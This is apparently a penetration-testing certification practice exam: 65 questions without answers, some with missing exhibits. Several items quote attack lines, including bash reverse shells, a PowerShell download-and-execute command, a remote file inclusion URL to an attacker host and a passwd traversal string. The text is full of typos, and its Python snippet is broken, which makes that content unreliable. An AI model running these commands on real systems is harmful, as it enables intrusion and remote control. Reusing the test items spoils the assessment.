EMT Practice Test

1. Question Content...


Question List

Question1: A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Give the below code and output Import requests from BeautifulSoup import BeautifulSoup request = requests.get ("https://www.bank.com/admin") respHeaders, respBody = request[0]. Request[1] if respHeader.statuscode == 200:
soup = BeautifulSoup (respBody)
soup = soup.FindAll ("div", ("type" : "hidden"))
print respHeader. StatusCode, StatusMessage
else:
print respHeader. StatusCode, StatusMessage
Output: 200 OK
Which of the following is the tester intending to do?

Question2: A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:
http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd
Which of the following attack types is MOST likely to be the vulnerability?

Question3: Black box penetration testing strategy provides the tester with:

Question4: Given the following script:

Which of the following BEST describes the purpose of this script?

Question5: Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO)

Question6: A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

Question7: A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?

Question8: While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

Question9: A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?

Question10: A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:
* Code review
* Updates to firewall settings
Which of the following has occurred in this situation?

Question11: A penetration tester ran the following Nmap scan on a computer:
nmap -aV 192.168.1.5
The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?

Question12: Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

Question13: During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?

Question14: A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

Question15: When performing compliance-based assessments, which of the following is the MOST important Key consideration?

Question16: A consultant is identifying versions of Windows operating systems on a network Which of the following Nmap commands should the consultant run?

Question17: In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?

Question18: A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profile s. For which of the following types of attack would this information be used?

Question19: While reviewing logs, a web developer notices the following user input string in a field:

Which of the following types of attacks was done to the website?

Question20: During an internal network penetration test, a tester recovers the NTLM password hash tor a user known to have full administrator privileges on a number of target systems Efforts to crack the hash and recover the plaintext password have been unsuccessful Which of the following would be the BEST target for continued exploitation efforts?

Question21: While engaging clients for a penetration test from highly regulated industries, which of the following is usually the MOST important to the clients from a business perspective?

Question22: Consider the following PowerShell command:
powershell.exe
IEX (New-Object Net.Webclient).downloadstring(http://site/
script.ps1");Invoke-Cmdlet
Which of the following BEST describes the actions performed this command?

Question23: Which of the following properties of the penetration testing engagement agreement will have the largest impact on observing and testing production systems at their highest loads?

Question24: While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?

Question25: A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?

Question26: A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

Question27: A client has voiced concern about the number of companies being branched by remote attackers, who are looking for trade secrets. Which of following BEST describes the types of adversaries this would identify?

Question28: An internal network penetration test is conducted against a network that is protected by an unknown NAC system In an effort to bypass the NAC restrictions the penetration tester spoofs the MAC address and hostname of an authorized system Which of the following devices if impersonated would be MOST likely to provide the tester with network access?

Question29: A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?

Question30: A constant wants to scan all the TCP Pots on an identified device. Which of the following Nmap switches will complete this task?

Question31: A penetration tester calls human resources and begins asking open-ended questions Which of the following social engineering techniques is the penetration tester using?

Question32: A penetration tester is using the Onesixtyone tool on Kali Linux to try to exploit the SNMP protocol on a target that has SNMP enabled Which of the following types of attacks is the penetration tester performing?

Question33: A tester intends to run the following command on a target system:
bash -i >& /dev/tcp/10.2.4.6/443 0> &1
Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?

Question34: A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

Question35: The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference? (Select TWO)

Question36: Which of the following is the purpose of an NDA?

Question37: If a security consultant comes across a password hash that resembles the following b117 525b3454 7Oc29ca3dBaeOb556ba8 Which of the following formats is the correct hash type?

Question38: A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?

Question39: Which of the following attacks is commonly combined with cross-site scripting for session hijacking?

Question40: Click the exhibit button.

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

Question41: A penetration tester executes the following commands:
C:\>%userprofile%\jtr.exe
This program has been blocked by group policy
C:\> accesschk.exe -w -s -q -u Users C:\Windows
rw C:\Windows\Tracing
C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing
C:\Windows\Tracing\jtr.exe
jtr version 3.2...
jtr>
Which of the following is a local host vulnerability that the attacker is exploiting?

Question42: A web server is running PHP, and a penetration tester is using LFI to execute commands by passing parameters through the URL. This is possible because server logs were poisoned to execute the PHP system ( ) function. Which of the following would retrieve the contents of the passwd file?

Question43: A security consultant found a SCADA device in one of the VLANs in scope. Which of the following actions would BEST create a potentially destructive outcome against device?

Question44: Which of Ihe following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

Question45: Performance based
You are a penetration Inter reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.







Question46: When conducting reconnaissance against a target, which of the following should be used to avoid directory communicating with the target?

Question47: An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack Which of the following actions should the penetration tester take?

Question48: A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for the penetration tester to take?

Question49: In which of the following scenarios would a tester perform a Kerberoasting attack?

Question50: An assessor begins an internal security test of the Windows domain internal.comptia.net. The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers?

Question51: A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?

Question52: A penetration tester observes that several high numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

Question53: A company has engaged a penetration tester to perform an assessment for an application that resides in the company's DMZ. Prior to conducting testing, in which of the following solutions should the penetration tester's IP address be whitelisted?

Question54: A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?

Question55: Defining exactly what is to be tested and the results to be generated from the test will help prevent?

Question56: Joe, an attacker, intends to transfer funds discreetly from a victim's account to his own. Which of the following URLs can he use to accomplish this attack?

Question57: A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?

Question58: After an Nmap NSE scan, a security consultant is seeing inconsistent results while scanning a host. Which of the following is the MOST likely cause?

Question59: A financial institution is asking a penetration tester to determine if collusion capabilities to produce wire fraud are present. Which of the following threat actors should the penetration tester portray during the assessment?

Question60: Which of the following excerpts would come from a corporate policy?

Question61: A penetration tester runs the following from a compromised box 'python -c -import pty;Pty.sPawn(
"/bin/bash").' Which of the following actions is the tester taking?

Question62: A penetration tester obtained access to an internal host of a given target. Which of the following is the BEST tool to retrieve the passwords of users of the machine exploiting a well-knows architecture flaw of the Windows OS?

Question63: Which of the following BEST describes the difference between a red team engagement and a penetration test?

Question64: The following line was found in an exploited machine's history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?

Question65: A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?